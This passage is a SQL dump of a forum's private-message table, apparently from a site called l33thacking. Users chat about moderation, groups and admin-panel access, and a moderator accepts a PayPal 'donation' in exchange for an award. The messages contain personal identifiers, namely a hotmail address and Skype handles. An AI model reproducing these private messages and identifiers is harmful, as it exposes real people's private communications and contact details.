`uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('582', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: New forum', '0', 'Alright aha, And anyways. When do you think the gaming section will be up? ', '1345853962', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('585', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: WAIT WAIT WAIT', '0', '[quote=\'t3h jok3r\'] The award thing I told you saying that it will be get removed was not for you. I mistakenly sent it to you. [/quote] yeah it didnt look like it was meant for me :p', '1345854131', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('586', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: WAIT WAIT WAIT', '0', '[quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] The award thing I told you saying that it will be get removed was not for you. I mistakenly sent it to you. [/quote] yeah it didnt look like it was meant for me :p [/quote] Lol Sorry though. ', '1345854258', '0', '1', '0', '1', '0', '0', '1345890465'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('594', '55', '82', '55', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Forum', '0', '[quote=\'iTzIpod\'] [quote=\'Baws\'] [quote=\'iTzIpod\'] Are you from a different forum? GK or LF? I think I saw you from a different forum. Or, someone has the same username as you. [/quote] I have been on many, not sure what GK and LF are. I\'m mostly active on HF tho [/quote] Don\'t you play a game called Maplestory? [/quote] nope', '1345857788', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('597', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: New forum', '0', '[quote=\'t3h jok3r\'] [quote=\'NXK\'] Alright aha, And anyways. When do you think the gaming section will be up? [/quote] I believe in 10 days. BTW, I\'m adding a Group section. Give it a few minz and if you want to make a group then apply in the thread. [/quote] Well If I moderate the gaming section, Ill probably make a gaming group and run it if you don\'t mind. ', '1345859276', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('607', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: New forum', '0', '[quote=\'t3h jok3r\'] [quote=\'NXK\'] [quote=\'t3h jok3r\'] [quote=\'NXK\'] Alright aha, And anyways. When do you think the gaming section will be up? [/quote] I believe in 10 days. BTW, I\'m adding a Group section. Give it a few minz and if you want to make a group then apply in the thread. [/quote] Well If I moderate the gaming section, Ill probably make a gaming group and run it if you don\'t mind. [/quote] Yeah, I don\'t think it would be a problem because I will be picking another Moderator to help you along. [/quote] Alright.', '1345860988', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('611', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Access', '0', '[quote=\'t3h jok3r\'] I need your new info to access ACP. The secret pin is the same. [/quote] You mean my user and pass?', '1345865381', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('617', '61', '82', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: (:', '0', 'Oh i\'m not mad at you don\'t worry aha. joker pretty much told me all that happend. Ill be running a gaming group soon. Ill make sure you\'re one of the co leaders :)', '1345867605', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('625', '61', '82', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Mod', '0', '[quote=\'iTzIpod\'] I might become a Moderator or LH. [/quote] Congrats man.', '1345868342', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('629', '61', '82', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Mod', '0', '[quote=\'iTzIpod\'] [quote=\'NXK\'] [quote=\'iTzIpod\'] I might become a Moderator or LH. [/quote] Congrats man. [/quote] Thanks. Oh and about that Youtube video of yours, Do you want me to remove it>? [/quote] No it\'s fine.', '1345868434', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('631', '112', '82', '112', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'hey', '0', 'hello :) skype: SamJKendall', '1345870391', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('637', '112', '82', '112', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: hey', '0', '[quote=\'iTzIpod\'] [quote=\'Kennerz\'] hello :) skype: SamJKendall [/quote] Sorry bout that. I am currently busy and not on right now. Add me though Skype: iTzIpod New laptop.. -.- [/quote] okay will add and yeah no problem. ', '1345872344', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('652', '67', '61', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Award', '0', 'Hey :) How do i get the Kind award? You [b]are[/b] the best moderator in my eyes :P I have 5$ i can donate to u :)', '1345908078', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('653', '67', '67', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Award', '0', '[quote=\'HoverCatz\'] Hey :) How do i get the Kind award? You [b]are[/b] the best moderator in my eyes :P I have 5$ i can donate to u :) [/quote] If you donate 5$ to me I tell teh joker that you have done it. And you will get the award.', '1345914635', '0', '3', '1345916151', '0', '0', '2', '1345916070'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('654', '61', '67', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '2', 'Re: Award', '0', '[quote=\'HoverCatz\'] Hey :) How do i get the Kind award? You [b]are[/b] the best moderator in my eyes :P I have 5$ i can donate to u :) [/quote] If you donate 5$ to me I tell teh joker that you have done it. And you will get the award.', '1345914635', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('657', '67', '61', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Re: Award', '0', '[quote=\'NXK\'] [quote=\'HoverCatz\'] Hey :) How do i get the Kind award? You [b]are[/b] the best moderator in my eyes :P I have 5$ i can donate to u :) [/quote] If you donate 5$ to me I tell teh joker that you have done it. And you will get the award. [/quote] k :P whats ur paypal?', '1345916151', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('658', '67', '67', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Award', '0', '[quote=\'HoverCatz\'] [quote=\'NXK\'] [quote=\'HoverCatz\'] Hey :) How do i get the Kind award? You [b]are[/b] the best moderator in my eyes :P I have 5$ i can donate to u :) [/quote] If you donate 5$ to me I tell teh joker that you have done it. And you will get the award. [/quote] k :P whats ur paypal? [/quote] fobonary@hotmail.com PM me back once it\'s sent ill let joker know.', '1345916713', '0', '3', '1345917182', '0', '0', '2', '1345917078'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('659', '61', '67', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '2', 'Re: Award', '0', '[quote=\'HoverCatz\'] [quote=\'NXK\'] [quote=\'HoverCatz\'] Hey :) How do i get the Kind award? You [b]are[/b] the best moderator in my eyes :P I have 5$ i can donate to u :) [/quote] If you donate 5$ to me I tell teh joker that you have done it. And you will get the award. [/quote] k :P whats ur paypal? [/quote] fobonary@hotmail.com PM me back once it\'s sent ill let joker know.', '1345916713', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('661', '67', '61', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Re: Award', '0', '[quote=\'NXK\'] [quote=\'HoverCatz\'] [quote=\'NXK\'] [quote=\'HoverCatz\'] Hey :) How do i get the Kind award? You [b]are[/b] the best moderator in my eyes :P I have 5$ i can donate to u :) [/quote] If you donate 5$ to me I tell teh joker that you have done it. And you will get the award. [/quote] k :P whats ur paypal? [/quote] fobonary@hotmail.com PM me back once it\'s sent ill let joker know. [/quote] There, do whatever u want with the $5 :)', '1345917182', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('662', '67', '67', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Award', '0', 'Alright aha, Ill let joker know now!', '1345917210', '0', '3', '1345917447', '0', '0', '2', '1345917270'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('663', '61', '67', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '2', 'Re: Award', '0', 'Alright aha, Ill let joker know now!', '1345917210', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('665', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Kind award', '0', 'http://l33thacking.com/member.php?action=profile&uid=67 This user donated me 5$. I\'m quite suprised but he actually did. So he needs the kind award.', '1345917316', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('667', '67', '61', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Re: Award', '0', '[quote=\'NXK\'] Alright aha, Ill let joker know now! [/quote] Oh, and many thanks for the Rep! :) Means alot :P', '1345917447', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('668', '67', '67', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Award', '0', '[quote=\'HoverCatz\'] [quote=\'NXK\'] Alright aha, Ill let joker know now! [/quote] Oh, and many thanks for the Rep! :) Means alot :P [/quote] No problem, Keep being HQ', '1345917669', '0', '1', '0', '0', '0', '2', '1345917747'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('669', '61', '67', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '2', 'Re: Award', '0', '[quote=\'HoverCatz\'] [quote=\'NXK\'] Alright aha, Ill let joker know now! [/quote] Oh, and many thanks for the Rep! :) Means alot :P [/quote] No problem, Keep being HQ', '1345917669', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('673', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Name color', '0', 'Hey, y is my name color the same as Members? O.o Change it to something that isnt in use, Orange if it looks baws', '1345918524', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('674', '67', '67', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Award', '0', 'I just checked my paypal, and when you sent the 5$ you made me pay fee, so I only got 4.50. You don\'t have too but is there anyway you could send me the other 50 cents or no. You don\'t have to but it would be nice.', '1345918661', '0', '3', '1345918848', '0', '0', '2', '1345918787'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('675', '61', '67', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '2', 'Re: Award', '0', 'I just checked my paypal, and when you sent the 5$ you made me pay fee, so I only got 4.50. You don\'t have too but is there anyway you could send me the other 50 cents or no. You don\'t have to but it would be nice.', '1345918661', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('677', '67', '61', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Re: Award', '0', '[quote=\'NXK\'] I just checked my paypal, and when you sent the 5$ you made me pay fee, so I only got 4.50. You don\'t have too but is there anyway you could send me the other 50 cents or no. You don\'t have to but it would be nice. [/quote] Oh, sorry i didnt know :O I dont know how to send without fee', '1345918848', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('678', '67', '67', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Award', '0', '[quote=\'HoverCatz\'] [quote=\'NXK\'] I just checked my paypal, and when you sent the 5$ you made me pay fee, so I only got 4.50. You don\'t have too but is there anyway you could send me the other 50 cents or no. You don\'t have to but it would be nice. [/quote] Oh, sorry i didnt know :O I dont know how to send without fee [/quote] It\'s like a dumb option with paypal it either makes you (the sender pay) or the reciever pay it. It\'s really stupid..', '1345918895', '0', '3', '1345920074', '0', '0', '2', '1345918940'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('679', '61', '67', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '2', 'Re: Award', '0', '[quote=\'HoverCatz\'] [quote=\'NXK\'] I just checked my paypal, and when you sent the 5$ you made me pay fee, so I only got 4.50. You don\'t have too but is there anyway you could send me the other 50 cents or no. You don\'t have to but it would be nice. [/quote] Oh, sorry i didnt know :O I dont know how to send without fee [/quote] It\'s like a dumb option with paypal it either makes you (the sender pay) or the reciever pay it. It\'s really stupid..', '1345918895', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('681', '67', '61', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Re: Award', '0', '[quote=\'NXK\'] [quote=\'HoverCatz\'] [quote=\'NXK\'] I just checked my paypal, and when you sent the 5$ you made me pay fee, so I only got 4.50. You don\'t have too but is there anyway you could send me the other 50 cents or no. You don\'t have to but it would be nice. [/quote] Oh, sorry i didnt know :O I dont know how to send without fee [/quote] It\'s like a dumb option with paypal it either makes you (the sender pay) or the reciever pay it. It\'s really stupid.. [/quote] I just checked the details, and it says 0 on Fee http://gyazo.com/00c0fa6644b5596bf0804b8ee71d4f90', '1345920074', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('682', '67', '67', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Award', '0', '[quote=\'HoverCatz\'] [quote=\'NXK\'] [quote=\'HoverCatz\'] [quote=\'NXK\'] I just checked my paypal, and when you sent the 5$ you made me pay fee, so I only got 4.50. You don\'t have too but is there anyway you could send me the other 50 cents or no. You don\'t have to but it would be nice. [/quote] Oh, sorry i didnt know :O I dont know how to send without fee [/quote] It\'s like a dumb option with paypal it either makes you (the sender pay) or the reciever pay it. It\'s really stupid.. [/quote] I just checked the details, and it says 0 on Fee http://gyazo.com/00c0fa6644b5596bf0804b8ee71d4f90 [/quote] because you made me pay for it. I\'m not trying to scam you for 50 cents lol..', '1345921109', '0', '3', '1345927038', '0', '0', '2', '1345924190'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('683', '61', '67', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '2', 'Re: Award', '0', '[quote=\'HoverCatz\'] [quote=\'NXK\'] [quote=\'HoverCatz\'] [quote=\'NXK\'] I just checked my paypal, and when you sent the 5$ you made me pay fee, so I only got 4.50. You don\'t have too but is there anyway you could send me the other 50 cents or no. You don\'t have to but it would be nice. [/quote] Oh, sorry i didnt know :O I dont know how to send without fee [/quote] It\'s like a dumb option with paypal it either makes you (the sender pay) or the reciever pay it. It\'s really stupid.. [/quote] I just checked the details, and it says 0 on Fee http://gyazo.com/00c0fa6644b5596bf0804b8ee71d4f90 [/quote] because you made me pay for it. I\'m not trying to scam you for 50 cents lol..', '1345921109', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('685', '67', '61', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Re: Award', '0', '[quote=\'NXK\'] [quote=\'HoverCatz\'] [quote=\'NXK\'] [quote=\'HoverCatz\'] [quote=\'NXK\'] I just checked my paypal, and when you sent the 5$ you made me pay fee, so I only got 4.50. You don\'t have too but is there anyway you could send me the other 50 cents or no. You don\'t have to but it would be nice. [/quote] Oh, sorry i didnt know :O I dont know how to send without fee [/quote] It\'s like a dumb option with paypal it either makes you (the sender pay) or the reciever pay it. It\'s really stupid.. [/quote] I just checked the details, and it says 0 on Fee http://gyazo.com/00c0fa6644b5596bf0804b8ee71d4f90 [/quote] because you made me pay for it. I\'m not trying to scam you for 50 cents lol.. [/quote] Selected \"Other\" :| ', '1345927038', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('686', '67', '67', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Award', '0', '[quote=\'HoverCatz\'] [quote=\'NXK\'] [quote=\'HoverCatz\'] [quote=\'NXK\'] [quote=\'HoverCatz\'] [quote=\'NXK\'] I just checked my paypal, and when you sent the 5$ you made me pay fee, so I only got 4.50. You don\'t have too but is there anyway you could send me the other 50 cents or no. You don\'t have to but it would be nice. [/quote] Oh, sorry i didnt know :O I dont know how to send without fee [/quote] It\'s like a dumb option with paypal it either makes you (the sender pay) or the reciever pay it. It\'s really stupid.. [/quote] I just checked the details, and it says 0 on Fee http://gyazo.com/00c0fa6644b5596bf0804b8ee71d4f90 [/quote] because you made me pay for it. I\'m not trying to scam you for 50 cents lol.. [/quote] Selected \"Other\" :| [/quote] It\'s just paypals transfer fee\'s. ', '1345927276', '0', '3', '1345927879', '0', '0', '2', '1345927835'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('687', '61', '67', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '2', 'Re: Award', '0', '[quote=\'HoverCatz\'] [quote=\'NXK\'] [quote=\'HoverCatz\'] [quote=\'NXK\'] [quote=\'HoverCatz\'] [quote=\'NXK\'] I just checked my paypal, and when you sent the 5$ you made me pay fee, so I only got 4.50. You don\'t have too but is there anyway you could send me the other 50 cents or no. You don\'t have to but it would be nice. [/quote] Oh, sorry i didnt know :O I dont know how to send without fee [/quote] It\'s like a dumb option with paypal it either makes you (the sender pay) or the reciever pay it. It\'s really stupid.. [/quote] I just checked the details, and it says 0 on Fee http://gyazo.com/00c0fa6644b5596bf0804b8ee71d4f90 [/quote] because you made me pay for it. I\'m not trying to scam you for 50 cents lol.. [/quote] Selected \"Other\" :| [/quote] It\'s just paypals transfer fee\'s. ', '1345927276', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('689', '67', '61', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Re: Award', '0', '[quote=\'NXK\'] [quote=\'HoverCatz\'] [quote=\'NXK\'] [quote=\'HoverCatz\'] [quote=\'NXK\'] [quote=\'HoverCatz\'] [quote=\'NXK\'] I just checked my paypal, and when you sent the 5$ you made me pay fee, so I only got 4.50. You don\'t have too but is there anyway you could send me the other 50 cents or no. You don\'t have to but it would be nice. [/quote] Oh, sorry i didnt know :O I dont know how to send without fee [/quote] It\'s like a dumb option with paypal it either makes you (the sender pay) or the reciever pay it. It\'s really stupid.. [/quote] I just checked the details, and it says 0 on Fee http://gyazo.com/00c0fa6644b5596bf0804b8ee71d4f90 [/quote] because you made me pay for it. I\'m not trying to scam you for 50 cents lol.. [/quote] Selected \"Other\" :| [/quote] It\'s just paypals transfer fee\'s. [/quote] I can send u another $5 when i get paid by my boss, as a Extra friendly donation :3', '1345927879', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('691', '53', '1', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Triple H', '0', 'I already wrote a thread about this 5min ago. I just wanted to say Triple H copied all his threads and tutorials of other websites. And not giving any credit to the real threadmaker. This is NOT right! regards', '1345928082', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('692', '67', '67', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Award', '0', 'you really don\'t have to, I just need 50 cents for riot points some how. Time to go work the corner.', '1345928138', '0', '1', '0', '0', '0', '2', '1345928190'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('693', '61', '67', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '2', 'Re: Award', '0', 'you really don\'t have to, I just need 50 cents for riot points some how. Time to go work the corner.', '1345928138', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('697', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Name color', '0', '[quote=\'HoverCatz\'] Hey, y is my name color the same as Members? O.o Change it to something that isnt in use, Orange if it looks baws [/quote] Sorry, we removed it. The reason is our number of upgrades would decrease as people would only join groups if they want a colorized username. ', '1345935111', '0', '3', '1345935339', '1', '0', '0', '1345935226'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('699', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Name color', '0', '[quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] Hey, y is my name color the same as Members? O.o Change it to something that isnt in use, Orange if it looks baws [/quote] Sorry, we removed it. The reason is our number of upgrades would decrease as people would only join groups if they want a colorized username. [/quote] Sorry im a bit confused. Removed wut o.o Oh btw im gonna donate 50$ to the forums soon', '1345935339', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, 